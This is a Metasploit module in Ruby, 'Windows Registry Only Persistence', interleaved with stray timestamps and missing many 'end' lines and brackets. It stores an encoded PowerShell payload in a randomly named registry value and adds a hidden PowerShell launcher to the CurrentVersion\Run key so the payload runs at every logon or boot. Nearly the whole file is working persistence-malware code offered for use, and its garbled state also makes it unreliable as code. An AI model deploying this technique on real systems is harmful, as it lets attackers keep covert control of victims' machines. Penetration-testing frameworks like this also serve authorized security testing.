2015-07-01 10:26:46 +00:00
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
require 'msf/core'
require 'msf/core/exploit/powershell'
require 'msf/core/post/file'
2015-07-01 14:09:55 +00:00
class Metasploit4 < Msf :: Exploit :: Local
Rank = ExcellentRanking
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include Msf :: Exploit :: Powershell
include Msf :: Post :: Windows :: Registry
include Msf :: Post :: File
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def initialize ( info = { } )
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super ( update_info ( info ,
'Name' = > 'Windows Registry Only Persistence' ,
'Description' = > %q{
This module will install a payload that is executed during boot .
It will be executed either at user logon or system startup via the registry
value in " CurrentVersion \ Run " ( depending on privilege and selected method ) .
The payload will be installed completely in registry .
} ,
'License' = > MSF_LICENSE ,
'Author' = >
'Donny Maasland <donny.maasland[at]fox-it.com>' ,
] ,
'Platform' = > [ 'win' ] ,
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'SessionTypes' = > [ 'meterpreter' , 'cmd' ] ,
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'Targets' = >
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[ 'Automatic' , { } ]
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] ,
'DefaultTarget' = > 0 ,
'DisclosureDate' = > " Jul 1 2015 " ,
'DefaultOptions' = >
'DisablePayloadHandler' = > 'true'
) )
register_options ( [
OptEnum . new ( 'STARTUP' ,
[ true , 'Startup type for the persistent payload.' , 'USER' , [ 'USER' , 'SYSTEM' ] ] ) ,
OptString . new ( 'BLOB_REG_KEY' ,
[ false , 'The registry key to use for storing the payload blob. (Default: random)' ] ) ,
OptString . new ( 'BLOB_REG_NAME' ,
[ false , 'The name to use for storing the payload blob. (Default: random)' ] ) ,
OptString . new ( 'RUN_NAME' ,
[ false , 'The name to use for the \'Run\' key. (Default: random)' ] ) ,
] , self . class )
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def generate_payload_blob
opts = {
use_single_quotes : true ,
encode_final_payload : true ,
blob = cmd_psh_payload ( payload . encoded , payload_instance . arch . first , opts ) . split ( ' ' ) [ - 1 ]
return blob
def generate_cmd ( root_path , blob_key_name , blob_key_reg )
cmd = " %COMSPEC% /b /c start /b /min powershell -w hidden -nop -c \" powershell -nop -w hidden -e (Get-Item ' #{ root_path } : #{ blob_key_name } ').GetValue(' #{ blob_key_reg } ') \" " # There might be a better way to do this.
return cmd
def generate_blob_reg
blob_reg_key = datastore [ 'BLOB_REG_KEY' ] || " Software \\ #{ Rex :: Text . rand_text_alphanumeric ( 8 ) } "
blob_reg_name = datastore [ 'BLOB_REG_NAME' ] || Rex :: Text . rand_text_alphanumeric ( 8 )
return blob_reg_key , blob_reg_name
def generate_cmd_reg
cmd_reg = datastore [ 'RUN_NAME' ] || Rex :: Text . rand_text_alphanumeric ( 8 )
return cmd_reg
def install_blob ( root_path , blob , blob_reg_key , blob_reg_name )
blob_reg_key = " #{ root_path } \\ #{ blob_reg_key } "
if not registry_enumkeys ( blob_reg_key )
unless registry_createkey ( blob_reg_key )
fail_with ( Failure :: Unknown , " Failed to create key #{ blob_reg_key } " )
print_good ( " Created registry key #{ blob_reg_key } " )
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unless registry_setvaldata ( blob_reg_key , blob_reg_name , blob , " REG_SZ " )
fail_with ( Failure :: Unknown , 'Failed to open the registry key for writing' )
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print_good ( " Installed payload blob to #{ blob_reg_key } \\ #{ blob_reg_name } " )
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def install_cmd ( cmd , cmd_reg , root_path )
unless registry_setvaldata ( " #{ root_path } \\ Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Run " , cmd_reg , cmd , 'REG_EXPAND_SZ' )
fail_with ( Failure :: Unknown , 'Could not install run key' )
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print_good ( " Installed run key #{ root_path } \\ Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Run \\ #{ cmd_reg } " )
def get_root_path
if datastore [ 'STARTUP' ] == 'USER'
root_path = 'HKCU'
root_path = 'HKLM'
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return root_path
def log_file ( log_path = nil ) # Thanks Meatballs for this
# Get hostname
host = session . session_host
# Create Filename info to be appended to downloaded files
filenameinfo = " _ " + :: Time . now . strftime ( " %Y%m%d.%M%S " )
# Create a directory for the logs
if log_path
logs = :: File . join ( log_path , 'logs' , 'persistence' ,
Rex :: FileUtils . clean_path ( host + filenameinfo ) )
logs = :: File . join ( Msf :: Config . log_directory , 'persistence' ,
Rex :: FileUtils . clean_path ( host + filenameinfo ) )
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# Create the log directory
:: FileUtils . mkdir_p ( logs )
# logfile name
logfile = :: File . join ( logs , Rex :: FileUtils . clean_path ( host + filenameinfo ) + '.rc' )
def create_cleanup ( root_path , blob_reg_key , cmd_reg ) # Thanks Meatballs for this
clean_rc = log_file ( )
@clean_up_rc = " "
@clean_up_rc << " reg deletekey -k ' #{ root_path } \\ #{ blob_reg_key } ' \n "
@clean_up_rc << " reg deleteval -k ' #{ root_path } \\ Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Run' -v ' #{ cmd_reg } ' \n "
file_local_write ( clean_rc , @clean_up_rc )
print_status ( " Clean up Meterpreter RC file: #{ clean_rc } " )
report_note ( :host = > session . session_host ,
type : 'host.persistance.cleanup' ,
data : {
local_id : session . sid ,
stype : session . type ,
desc : session . info ,
platform : session . platform ,
via_payload : session . via_payload ,
via_exploit : session . via_exploit ,
created_at : Time . now . utc ,
commands : @clean_up_rc
def exploit
print_status ( 'Generating payload blob..' )
blob = generate_payload_blob
print_good ( " Generated payload, #{ blob . length } bytes " )
root_path = get_root_path
print_status ( " Root path is #{ root_path } " )
blob_reg_key , blob_reg_name = generate_blob_reg
cmd = generate_cmd ( root_path , blob_reg_key , blob_reg_name )
cmd_reg = generate_cmd_reg
print_status ( 'Installing payload blob..' )
install_blob ( root_path , blob , blob_reg_key , blob_reg_name )
print_status ( 'Installing run key' )
install_cmd ( cmd , cmd_reg , root_path )
create_cleanup ( root_path , blob_reg_key , cmd_reg )
2015-07-01 10:50:34 +00:00